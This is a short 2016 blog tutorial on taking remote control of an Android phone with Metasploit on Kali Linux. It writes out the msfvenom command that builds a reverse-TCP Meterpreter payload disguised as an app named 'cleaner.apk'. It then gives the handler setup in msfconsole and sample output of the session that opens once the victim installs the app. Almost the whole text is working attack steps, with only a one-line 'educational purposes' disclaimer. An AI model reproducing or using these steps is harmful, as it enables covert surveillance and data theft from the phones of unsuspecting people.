Ankit R Gadiya

How to hack an Android Device

A tutorial for hacking an android device using Metasploit Framework on Kali Linux.

May 24, 2016

This is a tutorial for hacking an android using Metasploit Framework.

Note: This tutorial is for educational purposes I’m not responsible for any misuse of it.


  • Kali Linux
  • Metasploit Framework installed.

Note: This can be done on other distros with Metasploit package but Kali Linux gives favourable environment with all packages pre-installed.


  • Create an android apk file using msfvenom.
    $ msfvenom -p android/meterpreter/reverse_tcp LHOST="IP ADDR"
     LPORT=4444 R > cleaner.apk

    Note: Replace IP ADDR with your ip address.

  • Fire up msfconsole
    $ msfconsole
  • To listen to the payload, setup a handler.
    msf> use exploit/multi/handler
    msf exploit(handler)> set PAYLOAD android/meterpreter/reverse_tcp
  • Check its configurations.
    msf exploit(handler)> show options
  • Set the LHOST and LPORT you specified earlier using these commands.
    msf exploit(handler)> set LHOST "IP ADDR"
    msf exploit(handler)> set LPORT 4444
  • Start the exploit
    msf exploit(handler)> exploit

    You need to transfer the apk file we generated previously to the testing phone and install it. Once that app is opened in the phone meterpreter session will start.

    [*] Started reverse TCP handler on
    [*] Starting the payload handler...
    [*] Sending stage (63194 bytes) to
    [*] Meterpreter session 1 opened ( -> at 2016-055-24 _05:30
    meterpreter >
  • Done!

  • For options use this
    meterpreter > help